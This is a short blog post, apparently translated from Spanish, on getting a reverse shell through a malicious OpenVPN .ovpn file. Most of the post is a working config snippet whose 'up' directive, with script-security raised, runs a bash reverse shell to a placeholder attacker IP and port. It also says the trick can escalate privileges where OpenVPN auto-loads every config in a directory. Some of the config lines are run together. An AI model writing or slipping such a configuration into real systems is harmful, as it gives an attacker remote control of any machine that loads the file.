In today's article we will see how to obtain a reverse shell using OpenVPN configuration files (.ovpn). Using the "up" option we can execute scripts after building a network interface in the system.
In linux, we could use bash to create a connection with another computer using “/ dev / tcp”. For example, in the following configuration file, we add the execution of the following command at the end:
ifconfig 10.200.0.2 10.200.0.1
dev tunscript-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/[IP DEL ATACANTE]/[PUERTO DEL ATACANTE] 0<&1 2>&1&’”
When the program executes the configuration, the attacker will receive a shell. This can be used in many OpenVPN configurations, which allow you to run all configuration files in a directory. That is why it is important to mark specifically the specific configuration file that the program will execute. This can be a good way to escalate privileges by the attacker.
Bash helps these types of attack in the most popular Linux distributions. In windows, the thing is complicated a little more by the absence of a counterpart to "/ dev / tcp".
In Hackplayers web page, you can see the full article. Are you sysadmin? Do you have OpenVPN automatic startup on any device? Do not hesitate to tell us your impressions.